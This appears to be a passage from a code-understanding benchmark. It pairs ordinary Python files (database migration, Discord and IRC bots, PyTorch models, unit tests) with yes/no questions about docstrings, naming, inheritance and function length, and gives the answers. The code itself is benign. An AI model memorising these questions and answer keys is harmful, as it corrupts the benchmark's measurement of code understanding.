"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | jetbot/motor.py | vstoneofficial/jetbot-mecanum |
"""empty message
Revision ID: 0092_add_inbound_provider
Revises: 0091_letter_billing
Create Date: 2017-06-02 16:07:35.445423
"""
# revision identifiers, used by Alembic.
revision = '0092_add_inbound_provider'
down_revision = '0091_letter_billing'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
    # Add a nullable column recording which SMS provider delivered the
    # inbound message.
    op.add_column('inbound_sms', sa.Column('provider', sa.String(), nullable=True))
def downgrade():
    # Reverse of upgrade(): drop the provider column.
    op.drop_column('inbound_sms', 'provider')
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?... | 3 | migrations/versions/0092_add_inbound_provider.py | tlwr/notifications-api |
class GURL:
    """
    GURL is Google URL generator class which has 2 methods and constructor which takes in the query
    but has got 4 other parameters as well, Generate: which generates
    URL and get_url : which returns the string of generated url
    """

    def __init__(self, query, limit=100, filetype='html', timeperiod='w', safemode='active'):
        """
        This is the constructor which takes the query string and converts it into a parameterised
        google accepted URL.
        """
        self.base_url = "https://google.com"
        # Spaces become '+' so the query is URL-safe.
        self.query = query.replace(' ', '+')
        self.limit = limit
        self.filetype = filetype
        self.timeperiod = timeperiod
        self.safemode = safemode
        # Populated by generate().
        self.url = None

    def generate(self):
        """Build the search URL from the stored parameters and print it."""
        query_part = "/search?q={0}&num={1}&as_filetype='{2}'&as_qdr={3}&safe={4}".format(
            self.query, self.limit, self.filetype, self.timeperiod, self.safemode
        )
        self.url = self.base_url + query_part
        print("GENERATED URL : '{}'".format(self.url))

    def get_url(self):
        """ This method returns the generated URL in a string format """
        return self.url
if __name__ == '__main__':
    # Quick smoke test: generate (and print) a URL for the query 'SLoP'.
    OBJ = GURL('SLoP')
    OBJ.generate()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | Python/Tags_Scraper/URL_generator.py | CharvyJain/Rotten-Scripts |
#!/usr/bin/env python3
import logging
from discord import Intents
from discord.ext.commands import Bot, Context, check, when_mentioned_or
from config import CONFIG
from utils.utils import is_compsoc_exec_in_guild
DESCRIPTION = """
Apollo is the Discord bot for the University of Warwick Computing Society, designed to augment the server with a number of utilities and website services.
Apollo is open source and available at: https://github.com/UWCS/apollo. Pull requests are welcome!
"""

# The command extensions to be loaded by the bot
EXTENSIONS = [
    "cogs.commands.admin",
    "cogs.commands.blacklist",
    "cogs.commands.counting",
    "cogs.commands.date",
    "cogs.commands.flip",
    "cogs.commands.karma",
    "cogs.commands.lcalc",
    "cogs.commands.misc",
    "cogs.commands.quotes",
    "cogs.commands.reminders",
    "cogs.commands.roll",
    "cogs.commands.roomsearch",
    "cogs.commands.say",
    "cogs.commands.tex",
    "cogs.commands.widen",
    "cogs.database",
    "cogs.irc",
    "cogs.parallelism",
    "cogs.welcome",
]

# NOTE(review): the privileged members intent is enabled — presumably needed
# by cogs that inspect the member list; confirm against the cogs.
intents = Intents.default()
intents.members = True

# The bot responds to "!" or to being mentioned.
bot = Bot(
    command_prefix=when_mentioned_or("!"), description=DESCRIPTION, intents=intents
)
@bot.command()
@check(is_compsoc_exec_in_guild)
async def reload_cogs(ctx: Context):
    # Exec-only command: reload every extension in place, then acknowledge
    # with a checkmark reaction.
    for extension in EXTENSIONS:
        bot.reload_extension(extension)
    await ctx.message.add_reaction("✅")
@bot.event
async def on_ready():
    # Log the bot's identity once the gateway connection is established.
    if CONFIG.BOT_LOGGING:
        logging.info("Logged in as")
        logging.info(str(bot.user))
        logging.info("------")
def main():
    """Configure logging, load all extensions, and start the bot."""
    if CONFIG.BOT_LOGGING:
        logging.basicConfig(level=logging.WARNING)
    for extension in EXTENSIONS:
        try:
            logging.info(f"Attempting to load extension {extension}")
            bot.load_extension(extension)
        except Exception as e:
            # Bug fix: the original passed a plain string containing the
            # literal text "{extension}" (missing f-prefix); use lazy
            # %-formatting so the extension name is actually logged.
            logging.exception("Failed to load extension %s", extension, exc_info=e)
    bot.run(CONFIG.DISCORD_TOKEN)
# Script entry point.
if __name__ == "__main__":
    main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | apollo.py | ericthelemur/apollo |
from typing import List
from config import IRC
import requests
import ipaddress
import fido
from modules.access import require_permission, Levels
from models import SessionManager, config
from modules import configmanager
import logging
log = logging.getLogger(__name__)
@require_permission(level=Levels.OP, message='DENIED!')
async def lockdown(bot: fido, channel: str, sender: str, args: List[str]):
    # Op-only command: enable drone-protection lockdown. Idempotent —
    # reports if a lockdown is already active instead of re-applying it.
    ldstatus = configmanager.get_config('droneprotection', 'lockdown')
    if ldstatus:
        await bot.message(channel, "LOCKDOWN: Lockdown is already in effect.")
    else:
        await bot.message(channel, "LOCKDOWN: Locking down!")
        await bot.message("#ratchat", f"*** LOCKDOWN INITIATED *** Manual lockdown initiated, "
                                      f"new connections failing drone scans will now be KILLed and "
                                      f"non-clients redirected to #NewRats. This may cause some "
                                      f"clients to not be able to connect.")
        # Extended ban mask: redirect unidentified users to #NewRats.
        await bot.raw(f"MODE #ratchat +b ~f:#NewRats:~G:unknown-users\n")
        # Persist the state so disable_lockdown (and restarts) can see it.
        configmanager.set_config('droneprotection', 'lockdown', "True")
@require_permission(level=Levels.OP, message='DENIED!')
async def disable_lockdown(bot: fido, channel: str, sender: str, args: List[str]):
ldstatus = configmanager.get_config('droneprotection', 'lockdown')
if not ldstatus:
await bot.message(channel, "LOCKDOWN: Lockdown isn't enabled, doing nothing.")
else:
await bot.message(channel, "LOCKDOWN: Restoring normal operations.")
await bot.message("#ratchat", f"*** LOCKDOWN CLEARED *** Normal operations resumed. Channel "
f"join restrictions lifted, non-clients will now directly "
f"join #ratchat.")
await bot.raw(f"MODE #ratchat -b ~f:#NewRats:~G:unknown-users\n")
configmanager.del_config('droneprotection', 'lockdown')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | modules/commands/lockdown.py | FuelRats/FIDO |
def topla(a, b): return a + b
print(topla(2, 3))
topla2 = lambda a, b: a + b
print(topla2(2, 3))
def listeyiGoster(liste, gosteriFonksiyonu):
for i in liste:
print(gosteriFonksiyonu(i))
list = [
{"id": 1, "ad": "Alper", "soyad": "Konuralp" },
{"id": 2, "ad": "Burcu", "soyad": "Konuralp"},
{"id": 3, "ad": "Yağmur", "soyad": "Konuralp"},
]
listeyiGoster(list, lambda satir: f"{satir['ad']} {satir['soyad']}")
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | E028/main.py | alperkonuralp/AlperIlePython |
"""
# Author
Jakob Krzyston (jakobk@gatech.edu)
# Purpose
Build architecture for I/Q modulation classification as seen in Krzyston et al. 2020
"""
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
##### LINEAR COMBINATION FOR COMPLEX CONVOLUTION #####
class LC(nn.Module):
def __init__(self):
super(LC, self).__init__()
#this matrix adds the first and third columns of the output of Conv2d
def forward(self, x):
i = x[:,:,0:1,:]-x[:,:,2:3,:]
q = x[:,:,1:2,:]
return torch.cat([i,q],dim=2)
##### CLASSIFIER FROM KRZYSTON ET AL. 2020 #####
class Complex(nn.Module):
def __init__(self,
n_classes: int = 11
):
super(Complex, self).__init__()
# define the dropout layer
self.dropout = nn.Dropout(p = 0.5)
# convolutional layers w/ weight initialization
self.conv1 = nn.Conv2d(1, 256, kernel_size=(2,3), stride=1, padding = (1,1), bias = True)
torch.nn.init.xavier_uniform_(self.conv1.weight)
self.conv2 = nn.Conv2d(256, 80, kernel_size=(2,3), stride=1, padding = (0,1), bias = True)
torch.nn.init.xavier_uniform_(self.conv2.weight)
# dense layers w/ weight initialization
self.dense1 = nn.Linear(80*128, 256, bias =True)
torch.nn.init.kaiming_normal_(self.dense1.weight, nonlinearity='relu')
self.dense2 = nn.Linear(256,n_classes, bias = True)
torch.nn.init.kaiming_normal_(self.dense2.weight, nonlinearity='sigmoid')
# Defining the forward pass
def forward(self, x):
x = self.conv1(x)
x = LC.forward(self,x)
x = F.relu(x)
x = self.dropout(x)
x = F.relu(self.conv2(x))
x = self.dropout(x)
x = x.view(x.size(0), -1)
x = F.relu(self.dense1(x))
x = self.dense2(x)
return x | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | models_ieee_icc.py | LiLee1/High_Capacity_Complex_Networks |
# encoding: utf-8
"""
@author: xingyu liao
@contact: sherlockliao01@gmail.com
"""
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import Parameter
class CosSoftmax(nn.Module):
r"""Implement of large margin cosine distance:
Args:
in_feat: size of each input sample
num_classes: size of each output sample
"""
def __init__(self, cfg, in_feat, num_classes):
super().__init__()
self.in_features = in_feat
self._num_classes = num_classes
self.s = cfg.MODEL.HEADS.SCALE
self.m = cfg.MODEL.HEADS.MARGIN
self.weight = Parameter(torch.Tensor(num_classes, in_feat))
nn.init.xavier_uniform_(self.weight)
def forward(self, features, targets):
# --------------------------- cos(theta) & phi(theta) ---------------------------
cosine = F.linear(F.normalize(features), F.normalize(self.weight))
phi = cosine - self.m
# --------------------------- convert label to one-hot ---------------------------
targets = F.one_hot(targets, num_classes=self._num_classes)
output = (targets * phi) + ((1.0 - targets) * cosine)
output *= self.s
return output
def extra_repr(self):
return 'in_features={}, num_classes={}, scale={}, margin={}'.format(
self.in_feat, self._num_classes, self.s, self.m
)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | fastreid/layers/cos_softmax.py | tycallen/fast-reid |
"""
Copyright 2013 Steven Diamond, 2017 Akshay Agrawal
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import abc
class ParamProb:
"""An abstract base class for parameterized problems.
Parameterized problems are produced during the first canonicalization
and allow canonicalization to be short-circuited for future solves.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def is_mixed_integer(self) -> bool:
"""Is the problem mixed-integer?"""
raise NotImplementedError()
@abc.abstractproperty
def apply_parameters(self, id_to_param_value=None, zero_offset=False,
keep_zeros=False):
"""Returns A, b after applying parameters (and reshaping).
Args:
id_to_param_value: (optional) dict mapping parameter ids to values
zero_offset: (optional) if True, zero out the constant offset in the
parameter vector
keep_zeros: (optional) if True, store explicit zeros in A where
parameters are affected
"""
raise NotImplementedError()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/c... | 3 | cvxpy/problems/param_prob.py | rpradal/cvxpy |
import os
from functools import lru_cache
from pathlib import Path
from pydantic import BaseSettings
class Settings(BaseSettings):
PROJECT_NAME = "Book Search"
API_V1_STR = "/api/v1"
ES_HOST = "127.0.0.1:9200"
"""
.. _ES_HOST:
ElasticSearch hosts
"""
BACKEND_CORS_ORIGINS: str = ".*"
class Config:
case_sensitive = False
env_file = Path(os.getcwd()) / ".env"
@lru_cache()
def get_settings() -> BaseSettings:
"""
Get settings instance.
Cached via lru_cache.
"""
return Settings()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
}... | 3 | book_search/app_settings.py | yakky/microservice-talk |
# coding=utf-8
import unittest
from smallinvoice.accounts import Account
from smallinvoice.tests import get_smallinvoice
def generate_account():
return Account(title='Testaccount',
institute='Familie Test',
number='Number123',
iban='Iban123',
swiftbic='Swift123',
clearing='clearing123',
postaccount='postaccount123',
lsv=0,
dd=0,
esr=1)
class AccountTests(unittest.TestCase):
def setUp(self):
self.a = generate_account()
self.account_id = get_smallinvoice().accounts.add(self.a)
def tearDown(self):
get_smallinvoice().accounts.delete(self.account_id)
def test_account_tests(self):
self.assertIsNotNone(self.account_id)
def test_account_add(self):
self.assertTrue(self.account_id)
def test_account_details(self):
self.assertEqual(self.a.institute, 'Familie Test')
def test_account_update(self):
self.assertEqual(self.a.institute, 'Familie Test')
self.a.institute = 'Test Change'
self.assertEqual(self.a.institute, 'Test Change')
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | smallinvoice/tests/accounts_tests.py | dreipol/smallinvoice |
from __future__ import absolute_import, unicode_literals
from django import forms
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from mayan.apps.common.classes import ModelProperty
from mayan.apps.common.forms import FilteredSelectionForm
from mayan.apps.documents.models import Document
from .models import Index, IndexTemplateNode
from .permissions import permission_document_indexing_rebuild
class IndexTemplateFilteredForm(FilteredSelectionForm):
class Meta:
allow_multiple = True
field_name = 'index_templates'
help_text = _('Index templates to be queued for rebuilding.')
label = _('Index templates')
queryset = Index.objects.filter(enabled=True)
permission = permission_document_indexing_rebuild
widget_attributes = {'class': 'select2'}
class IndexTemplateNodeForm(forms.ModelForm):
"""
A standard model form to allow users to create a new index template node
"""
def __init__(self, *args, **kwargs):
super(IndexTemplateNodeForm, self).__init__(*args, **kwargs)
self.fields['index'].widget = forms.widgets.HiddenInput()
self.fields['parent'].widget = forms.widgets.HiddenInput()
self.fields['expression'].help_text = ' '.join(
[
force_text(self.fields['expression'].help_text),
'<br>',
ModelProperty.get_help_text_for(
model=Document, show_name=True
).replace('\n', '<br>')
]
)
class Meta:
fields = ('parent', 'index', 'expression', 'enabled', 'link_documents')
model = IndexTemplateNode
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{... | 3 | mayan/apps/document_indexing/forms.py | Syunkolee9891/Mayan-EDMS |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities and tools to assist NQL tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from language.nql import nql
def cell(i, j):
"""Makes a cell name from coordinates."""
return 'cell_%d_%d' % (i, j)
def make_grid():
"""Create a grid, with relations for going n, s, e, w."""
result = nql.NeuralQueryContext()
result.declare_relation('n', 'place_t', 'place_t')
result.declare_relation('s', 'place_t', 'place_t')
result.declare_relation('e', 'place_t', 'place_t')
result.declare_relation('w', 'place_t', 'place_t')
result.declare_relation('color', 'place_t', 'color_t')
result.declare_relation('distance_to', 'place_t', 'corner_t')
kg_lines = []
dij = {'n': (-1, 0), 's': (+1, 0), 'e': (0, +1), 'w': (0, -1)}
for i in range(0, 4):
for j in range(0, 4):
cell_color = 'black' if (i % 2) == (j % 2) else 'white'
kg_lines.append('\t'.join(['color', cell(i, j), cell_color]) + '\n')
kg_lines.append(
'\t'.join(['distance_to', cell(i, j), 'ul',
str(i + j)]) + '\n')
for direction, (di, dj) in dij.items():
if (0 <= i + di < 4) and (0 <= j + dj < 4):
kg_lines.append(
'\t'.join([direction, cell(i, j),
cell(i + di, j + dj)]) + '\n')
result.load_kg(lines=kg_lines, freeze=True)
return result
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fals... | 3 | language/nql/nql_test_lib.py | Ram81/language |
import torch
import torch.nn as nn
class ValueNet(nn.Module):
"""
The part of the actor critic network that computes the state value. Also,
returns the hidden layer before state valuation, for use in action network.
"""
def __init__(self, n_inputs: int, n_hidden: int = None):
"""
Specify the number of inputs. Also, specify the number of nodes in each
hidden layer. If no value is provided for the number of hidden, then
it is set to half the number of inputs.
"""
super(ValueNet, self).__init__()
if n_hidden is None:
n_hidden = (n_inputs + 2) // 2
self.n_hidden = n_hidden
self.hidden = nn.Sequential(
nn.Linear(n_inputs, n_hidden),
nn.ReLU()
)
self.value = nn.Linear(n_hidden, 1)
def forward(self, x):
"""
Returns the value of the state and the hidden layer values.
"""
x = self.hidden(x)
return self.value(x), x
class ActionNet(nn.Module):
"""
The part of the actor critic network that computes the action value.
"""
def __init__(self, n_action_inputs: int, n_value_hidden: int,
n_action_hidden: int = None):
"""
Takes as input the action features and the hidden values from the value
net. Returns a value for the action.
"""
super(ActionNet, self).__init__()
if n_action_hidden is None:
n_action_hidden = (n_action_inputs + n_value_hidden + 2) // 2
self.hidden = nn.Sequential(
nn.Linear(n_action_inputs + n_value_hidden, n_action_hidden),
nn.ReLU()
)
self.action_value = nn.Linear(n_action_hidden, 1)
def forward(self, action_x, value_hidden):
"""
Returns the value of the state and the hidden layer values.
"""
x = self.hidden(torch.cat((action_x, value_hidden), 1))
return self.action_value(x)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?"... | 3 | apprentice/learners/when_learners/actor_critic.py | pearlfranz20/AL_Core |
from LAMARCK_ML.models.interface import ModellUtil
class DataSaverInterface(ModellUtil):
def __init__(self, **kwargs):
super(DataSaverInterface, self).__init__(**kwargs)
def get_individual_by_name(self, name):
raise NotImplementedError()
def get_ancestry_for_ind(self, ind_name):
raise NotImplementedError()
def get_ancestries(self):
raise NotImplementedError()
def get_individual_names(self):
raise NotImplementedError() | [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | LAMARCK_ML/utils/dataSaver/interface.py | JonasDHomburg/LAMARCK |
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 1.4.58
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kinow_client
from kinow_client.rest import ApiException
from kinow_client.models.gender import Gender
class TestGender(unittest.TestCase):
""" Gender unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testGender(self):
"""
Test Gender
"""
model = kinow_client.models.gender.Gender()
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
... | 3 | test/test_gender.py | kinow-io/kinow-python-sdk |
#!/usr/bin/python3
"""
Given an unsorted array nums, reorder it such that nums[0] < nums[1] > nums[2]
< nums[3]....
Example 1:
Input: nums = [1, 5, 1, 1, 6, 4]
Output: One possible answer is [1, 4, 1, 5, 1, 6].
Example 2:
Input: nums = [1, 3, 2, 2, 3, 1]
Output: One possible answer is [2, 3, 1, 3, 1, 2].
Note:
You may assume all input has valid answer.
Follow Up:
Can you do it in O(n) time and/or in-place with O(1) extra space?
"""
from typing import List
class Solution:
def wiggleSort(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
Median + 3-way partitioning
"""
n = len(nums)
# mid = self.find_kth(nums, 0, n, (n - 1) // 2)
# median = nums[mid]
median = list(sorted(nums))[n//2]
# three way pivot
odd = 1
even = n - 1 if (n - 1) % 2 == 0 else n - 2
i = 0
while i < n:
if nums[i] < median:
if i >= even and i % 2 == 0:
i += 1
continue
nums[i], nums[even] = nums[even], nums[i]
even -= 2
elif nums[i] > median:
if i <= odd and i % 2 == 1:
i += 1
continue
nums[i], nums[odd] = nums[odd], nums[i]
odd += 2
else:
i += 1
def find_kth(self, A, lo, hi, k):
p = self.pivot(A, lo, hi)
if k == p:
return p
elif k > p:
return self.find_kth(A, p + 1, hi, k)
else:
return self.find_kth(A, lo, p, k)
def pivot(self, A, lo, hi):
# need 3-way pivot, otherwise TLE
p = lo
closed = lo
for i in range(lo + 1, hi):
if A[i] < A[p]:
closed += 1
A[closed], A[i] = A[i], A[closed]
A[closed], A[p] = A[p], A[closed]
return closed
if __name__ == "__main__":
Solution().wiggleSort([1, 5, 1, 1, 6, 4])
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | 324 Wiggle Sort II py3.py | krishna13052001/LeetCode |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from heat.common import wsgi
ssl_middleware_opts = [
cfg.StrOpt('secure_proxy_ssl_header',
default='X-Forwarded-Proto',
help="The HTTP Header that will be used to determine which "
"the original request protocol scheme was, even if it was "
"removed by an SSL terminator proxy.")
]
cfg.CONF.register_opts(ssl_middleware_opts)
class SSLMiddleware(wsgi.Middleware):
"""Replaces request wsgi.url_scheme env variable with value of HTTP header.
A middleware that replaces the request wsgi.url_scheme environment
variable with the value of HTTP header configured in
secure_proxy_ssl_header if exists in the incoming request.
This is useful if the server is behind a SSL termination proxy.
"""
def __init__(self, application):
super(SSLMiddleware, self).__init__(application)
self.secure_proxy_ssl_header = 'HTTP_{0}'.format(
cfg.CONF.secure_proxy_ssl_header.upper().replace('-', '_'))
def process_request(self, req):
req.environ['wsgi.url_scheme'] = req.environ.get(
self.secure_proxy_ssl_header, req.environ['wsgi.url_scheme'])
def list_opts():
yield None, ssl_middleware_opts
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | heat/api/middleware/ssl.py | maestro-hybrid-cloud/heat |
import validate
# Test license numbers
ESMA_NUMBER = "E142304"
AHA_NUMBER = "195506016954"
ARC_NUMBER = "10FMU9"
DCA_NUMBER = "G 50925"
DCA_LASTNAME = "DOEMENY"
# Expected test results
ESMA_EXPECTED_RESULT = """
FULL NAME: Benjamin Thales Lenington
LICENSE STATUS: Active
LICENSE TYPE: EMT
ISSUE DATE: 9/14/2018
EXP DATE: 9/30/2022
"""
AHA_EXPECTED_RESULT = "TODO"
ARC_EXPECTED_RESULT = "TODO"
DCA_EXPECTED_RESULT = "TODO"
def test_validate_esma():
test_result = validate.validate_esma(ESMA_NUMBER)
assert ESMA_EXPECTED_RESULT in test_result
def test_validate_aha():
test_result = validate.validate_aha(AHA_NUMBER)
assert test_result == AHA_EXPECTED_RESULT
def test_validate_arc():
test_result = validate.validate_arc(ARC_NUMBER)
assert test_result == ARC_EXPECTED_RESULT
def test_validate_dca():
test_result = validate.validate_dca(DCA_NUMBER)
assert test_result == DCA_EXPECTED_RESULT
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | test_validate.py | benlen10/med-license-validator |
import logging
from datetime import datetime
import os
class Logger():
DEBUG = logging.DEBUG
INFO = logging.INFO
WARNING = logging.WARNING
ERROR = logging.ERROR
def __init__(self, name, path, level=DEBUG):
self._logger = None
self._setLogger(name, path, level)
def _setLogger(self, name, path, level):
self._logger = logging.getLogger(name)
self._logger.setLevel(level)
fileName = name + "-" + datetime.now().strftime("%Y-%m-%d-%H:%M:%S") + '.log'
fh = logging.FileHandler(os.path.join(path, fileName))
fh.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
ch.setFormatter(formatter)
fh.setFormatter(formatter)
self._logger.addHandler(ch)
self._logger.addHandler(fh)
@property
def logger(self):
return self._logger
def close(self):
handlers = self._logger.handlers[:]
for handler in handlers:
handler.close()
self._logger.removeHandler(handler)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | Logger/Logger.py | AsimJalwana/LUTA |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from apache_beam.typehints import typehints
class RowTypeConstraint(typehints.TypeConstraint):
def __init__(self, fields):
self._fields = tuple(fields)
def _consistent_with_check_(self, sub):
return self == sub
def type_check(self, instance):
from apache_beam import Row
return isinstance(instance, Row)
def _inner_types(self):
"""Iterates over the inner types of the composite type."""
return [field[1] for field in self._fields]
def __eq__(self, other):
return type(self) == type(other) and self._fields == other._fields
def __hash__(self):
return hash(self._fields)
def __repr__(self):
return 'Row(%s)' % ', '.join(
'%s=%s' % (name, typehints._unified_repr(t)) for name,
t in self._fields)
def get_type_for(self, name):
return dict(self._fields)[name]
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherit... | 3 | sdks/python/apache_beam/typehints/row_type.py | NarimanAB/beam |
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import rdt
import sdv
from TrainDBBaseModel import TrainDBSynopsisModel
import pandas as pd
import torch
LOGGER = logging.getLogger(__name__)
class TVAE(TrainDBSynopsisModel):
def train(self, real_data, table_metadata):
self.columns, _ = self.get_columns(real_data, table_metadata)
LOGGER.info("Training %s", self.__class__.__name__)
model_kwargs = {}
self.model = sdv.tabular.TVAE(table_metadata=table_metadata, **model_kwargs)
self.model.fit(real_data)
def save(self, output_path):
self.model.save(output_path + '/model.pkl')
torch.save({
'columns': self.columns
}, output_path + '/model_info.pth')
def load(self, input_path):
self.model = sdv.tabular.TVAE.load(input_path + '/model.pkl')
saved_model_info = torch.load(input_path + '/model_info.pth')
self.columns = saved_model_info['columns']
def synopsis(self, row_count):
LOGGER.info("Synopsis Generating %s", self.__class__.__name__)
synthetic_data = self.model.sample(row_count)
synthetic_data = pd.DataFrame(synthetic_data, columns=self.columns)
return synthetic_data
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self... | 3 | models/TVAE.py | traindb-project/traindb-model |
def leia_int(n):
while True:
try:
nu = int(input(n))
except(ValueError, TypeError):
print('\033[31mERRO: por favor, digite um número inteiro válido.\033[m')
continue
else:
return nu
def leia_float(n):
while True:
try:
nu = float(input(n))
except(ValueError,TypeError):
print('ERRO: por favor, digite um número real valido')
else:
return nu
def leia_dado(esc):
valido = False
while not valido:
